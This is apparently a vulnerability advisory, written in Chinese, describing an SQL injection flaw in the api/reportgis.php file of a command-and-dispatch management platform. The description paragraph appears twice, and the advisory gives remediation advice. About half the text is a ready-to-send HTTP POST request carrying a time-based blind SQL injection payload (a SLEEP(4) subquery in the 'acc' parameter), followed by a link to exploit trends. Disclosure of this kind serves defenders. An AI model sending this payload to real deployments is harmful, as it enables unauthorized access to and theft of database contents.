Description
指挥调度管理平台的 api/reportgis.php文件存在 SQL 注入漏洞,攻击者可通过构造恶意请求参数(如 GET/POST 数据)注入非法 SQL代码,从而绕过身份验证、窃取数据库敏感信息或执行任意数据库操作。该漏洞源于代码层未对用户输入进行严格的参数化过滤或预编译处理,存在较高的安全风险。建议修复措施包括:使用参数化查询(PreparedStatements)、对输入数据进行白名单校验、升级至安全版本,并部署 WAF 进行防护。
指挥调度管理平台的 api/reportgis.php文件存在 SQL 注入漏洞,攻击者可通过构造恶意请求参数(如 GET/POST 数据)注入非法 SQL代码,从而绕过身份验证、窃取数据库敏感信息或执行任意数据库操作。该漏洞源于代码层未对用户输入进行严格的参数化过滤或预编译处理,存在较高的安全风险。建议修复措施包括:使用参数化查询(PreparedStatements)、对输入数据进行白名单校验、升级至安全版本,并部署 WAF 进行防护。
POST /api/client/reportgis.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
acc=1' AND (SELECT 4068 FROM (SELECT(SLEEP(4)))Vgsc)-- QHH
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.